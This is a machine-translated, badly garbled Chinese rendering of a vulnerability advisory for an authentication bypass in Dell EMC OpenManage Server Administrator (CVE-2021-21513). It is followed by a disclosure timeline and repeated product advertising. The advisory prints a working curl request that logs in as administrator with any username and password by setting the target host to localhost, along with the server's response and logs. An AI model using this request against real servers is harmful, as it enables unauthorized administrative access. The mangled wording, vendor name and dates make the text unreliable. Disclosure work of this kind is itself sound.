脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

Dell EMC开放管理服务器管理员验证旁路

临界点

简表

OpenManage服务器管理员We服务器远程启动组件安装到DellEMC设备并启动托管系统登录特征(默认为s9.5.0)时,非认证远程攻击者可登录OMSA管理员身份,而不知道系统上正确的OS用户名和密码

托管系统登录功能启动后OMSA网络服务器显示托管系统登录页在此例中, web服务器可用连接远程节点/系统取远程节点IP/主机名用户名和密码并发HTTPSWS管理程序连接远程节点远程启动组件

远程节点IP/主机名设置为localhost时,WS-管理连接WS服务器运行时同一主机远程增强组件发现用户名和密码都有效

概念证明

执行验证旁路时攻击者执行下列操作:

  • web浏览器获取 https/ 1311
  • 切换管理系统登录页
  • 主机名/IP地址域使用本地主机
  • 指定用户名域中的任何用户名
  • 指定密码字段中的任何密码(即BBB)
  • 检查“Ignore证书警告”复选框
  • 点击提交按钮

CURL命令显示成功登录OMSA并不知道正确的用户名和密码,因为响应为HTTP重定向OMSATT

curl -ki -d 'manuallogin=true&targetmachine=localhost&user=AAAA&password=BBBB&application=omsa&ignorecertificate=1' 'https://
              
               :1311/LoginServlet?flag=true&managedws=false'  HTTP/1.1 302 Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1!mode=block Set-Cookie: JSESSIONID=E765A274F3CAD6740E2604D5C9276D17;Path=/4A6A8DFC482BD64D;secure!HttpOnly Location: /4A6A8DFC482BD64D/OMSAStart?mode=omsa&vid=4A6A8DFC482BD64D vary: accept-encoding Content-Length: 0
              

日志显示更多成功认证旁登录细节

[39]2020-11-17 22:21:48.463 loginUser.OMAHttpServlet, sUserName=AAAA [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.463 CharConverter, added charset while getting bytestream UTF-8 [39]2020-11-17 22:21:48.479 value of on mean AD auth, slocalLogin=null [39]2020-11-17 22:21:48.479 true for login via login page, sManualLogin=true [39]2020-11-17 22:21:48.479 HttpServlet: login user:value of ignorecertificate=true [39]2020-11-17 22:21:48.479 HttpServlet: login user:value of hostname=localhost [39]2020-11-17 22:21:48.495 HttpServlet: login user: Port is not passed - IPV4 Taking default [39]2020-11-17 22:21:48.495 HttpServlet: EnableDWS pref setting is===true [39]2020-11-17 22:21:48.495 OMAWPUtil.generateVID:0643A39C06A46299 [39]2020-11-17 22:21:48.495 OMAWPUtil.currentVID:0643A39C06A46299 [39]2020-11-17 22:21:48.557 sXML of getwsmanclient:
              
               
                0
               
               
                0
               
               
                二百
               
               
                http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
               
              esendCdtoDA-目标机:null [3920620-111722:2186.620OMAWPETU.sendCdtoDA-用户名:Null [392020-11
              
               0
              
              
               0
              
              
               0
              
              
               二百
              
              
               0
              
              
               
                
                 262151
                
                
                 AAA
                
               
               
                0
               
              [...][3920-11-1722:21:49.354OMAHtpServlet.logUser:AAA7:4

引擎盖下传客户命令登录远程节点远程节点IP/主机名设置为localhost,gewsman客户端命令发送到本地主机并成功使用(WSManstatus=0)甚至无效用户名和密码

后发单用户权限命令获取用户权限命令也成功(WSManstatus=0),账号用户权限7最高

登录后不知道正确的用户名和密码,攻击者可执行OSSA设计的所有操作举例说,s/he可添加Dell服务器综合远程存取控制器管理用户攻击者可登录iDRAC并拥有行政特权

求解

升级版9.4.0.3或9.5.0.1

披露时间线

11/17/2020-漏洞发现
11/30/2020-向Dell报告漏洞90天日期为2021年3月01日
12/01/2020-Dell跟踪PSRC-14647他们会调查问题
12/03/2020-可接受确认感谢戴尔响应留守未来通信
12/03/2020-Dell请求更多资料和POC视频
12/04/2020-可租性提供更多信息和POC视频
12/10/2020-Dell请求会见发现者
12/10/2020-可耐性偏重写入过程查询具体问题/反馈
12/15/2020-Dell无法复制实验题问我们能否虚拟相遇
12/16/2020-Dell可复制问题并正致力于影响评估很快他们会回电
12/16/2020-可接受确认
12/16/2020-Dell请求我们灵活响应
12/16/2020-耐用请求澄清
12/16/2020-Dell询问下星期能否带冲击说明回电
12/16/2020-房客表示可以
12/17/2020-Dell验证结果通信修复/缓解信息ASAP问我们是否想被确认
12/17/2020-可行感谢Dell验收可登公司请求按预期补丁/咨询发布日期通知
12/18/2020-Dell对准March修复问我们想如何被识别
12/18/2020-可接受感谢Dell敬礼贵公司
01/04/2021-可点名请求更新
01/07/2021-Dell3月前修复问我们是否需要具体信息
01/07/2021-可接受感谢Dell引用修复版本和CVE标识
02/12/2021-可点名请求更新
02/15/2021-Dell3月15日发布咨询可提供CVE标识贴近发布日期请求咨询预览
02/16/2021-可租状态90天策略提供咨询草稿
02/18/2021-Dell计划90天日期提供识别码和CVE识别码
02/25/2021-可支付感谢Dell

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

CVE识别码 CVE2021-21513
可租咨询ID
TRA-2021-07
sv3基础/时间评分
9.8/8.8
CVSSv3向量
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
受影响产品
Dell EMC开关服务器管理员对Windows
风险因子
临界点

咨询时间线

03/01/2021咨询发布
03/02/2021-添加引用Dell咨询

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map